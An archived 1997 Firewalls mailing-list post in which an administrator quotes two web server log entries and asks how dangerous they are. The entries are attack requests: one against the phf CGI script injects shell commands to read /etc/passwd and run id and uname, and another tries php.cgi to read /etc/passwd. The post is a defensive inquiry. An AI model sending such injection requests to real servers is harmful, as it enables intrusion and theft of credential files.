Firewalls: getting passwd file via WWW

Firewalls
(June 1997)

Indexed By Thread: [Previous] [Next]

Subject:	getting passwd file via WWW
From:	Stan Wnuck <swnuck @ unixpros . com>
Date:	Wed, 4 Jun 97 12:04:34 EDT
To:	Firewalls @ GreatCircle . COM
Mailer:	Elm [revision: 70.85]

Hi all,

I have noticed on my WWW log files the following 2 entries.
 
some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143


Does anyone know anything about these cgi scripts or programs?
Or how dangerous this is?


I changed the real source location to a fake some.remote.location.edu to
not let out the bag of the source of this hack, since I am not sure what
my next move would be.


Thanks in advance.



Stan Wnuck               swnuck @
 unixpros .
 com
Unixpros, Inc.
10 Industrial Way East   (908) 389-3295 x542
Eatontown, NJ 07724      (908) 389-5461 Fax

PM-CHS Technology Insertion Office
Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963

Follow-Ups:

Re: getting passwd file via WWW
From: Root Admin-KSoft <root @ sibernet . com . tr>
Re: getting passwd file via WWW
From: girsch @ marben . com (Arnaud Girsch)
Re: getting passwd file via WWW
From: "Gary G. Hull" <ggh14854 @ glaxowellcome . com>
Re: getting passwd file via WWW
From: Alan <alano @ teleport . com>

Indexed By Date	Previous:	Re: Plug-gw- One to many relationship From: ArkanoiD <ark @ paranoid . convey . ru>
Indexed By Date	Next:	RE: PIX and Firewall-1 (Thesis Length) From: "Daniel J Blander - Sr. Systems Engineer for ACS" <Daniel . Blander @ ACSacs . Com>
Indexed By Thread	Previous:	Strange logs From: Corneliu Tanasa <cornel @ logicnet . ro>
Indexed By Thread	Next:	Re: getting passwd file via WWW From: Alan <alano @ teleport . com>